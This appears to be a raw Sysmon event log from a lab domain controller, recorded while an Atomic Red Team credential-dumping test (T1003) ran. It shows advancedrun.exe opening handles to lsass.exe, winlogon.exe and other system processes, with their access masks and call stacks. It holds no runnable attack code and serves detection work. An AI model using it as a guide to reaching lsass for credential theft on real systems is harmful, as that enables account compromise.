17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003943896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
